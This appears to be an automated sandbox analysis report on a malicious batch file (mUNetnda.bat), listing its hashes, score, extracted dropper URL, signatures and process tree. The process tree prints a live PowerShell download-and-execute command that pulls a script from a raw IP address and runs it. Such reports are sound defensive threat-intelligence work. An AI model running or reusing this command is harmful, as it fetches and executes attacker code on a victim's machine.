Analysis
max time kernel: 109s
max time network: 150s
platform: windows10_x64
resource: win10v200217
submitted: 01-04-2020 17:10
Static task: static1
Behavioral task: behavioral1
  Sample: mUNetnda.bat
  Resource: win7v200217 (windows7_x64)
  0 signatures, 0 seconds
Behavioral task: behavioral2
  Sample: mUNetnda.bat
  Resource: win10v200217 (windows10_x64)
  0 signatures, 0 seconds
General
Target: mUNetnda.bat
Size: 190B
MD5: 8d47ed92c538cfd43a00b6489d8b4af4
SHA1: f5b96923c6ba26d2cc1b8d7931c713ced4c9a8b3
SHA256: fdb71ddc395ffaf887e8f74472c3d02d098a948b96eb4a022f8ab36d3232a507
SHA512: 18a320853db978eae913be9170806265455a882d72f2a853d4747623a6940240824c3ed952457fea512ec6d9ef3f7fd2b2f790dccf904c205594cf2e06eb4586
Score: 10/10
Malware Config
Extracted
  Language: ps1
  Source: URLs
  ps1.dropper: http://185.103.242.78/pastes/mUNetnda
Signatures
- Program crash (1 IoC)
  Processes:
    pid: 3092, process: WerFault.exe, pid_target: 3620, target process: powershell.exe
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes:
    Token: SeRestorePrivilege, pid: 3092, process: WerFault.exe
    Token: SeBackupPrivilege, pid: 3092, process: WerFault.exe
    Token: SeDebugPrivilege, pid: 3092, process: WerFault.exe
- Suspicious behavior: EnumeratesProcesses (14 IoCs)
  Processes:
    pid: 3092, process: WerFault.exe (14 occurrences)
Processes
- C:\Windows\system32\cmd.exe (depth 1, PID:1992)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\mUNetnda.bat"
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 2, PID:3620)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/mUNetnda');Invoke-LISWYRT;Start-Sleep -s 10000"
    - C:\Windows\SysWOW64\WerFault.exe (depth 3, PID:3092)
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 704
      Signatures:
      - Program crash
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses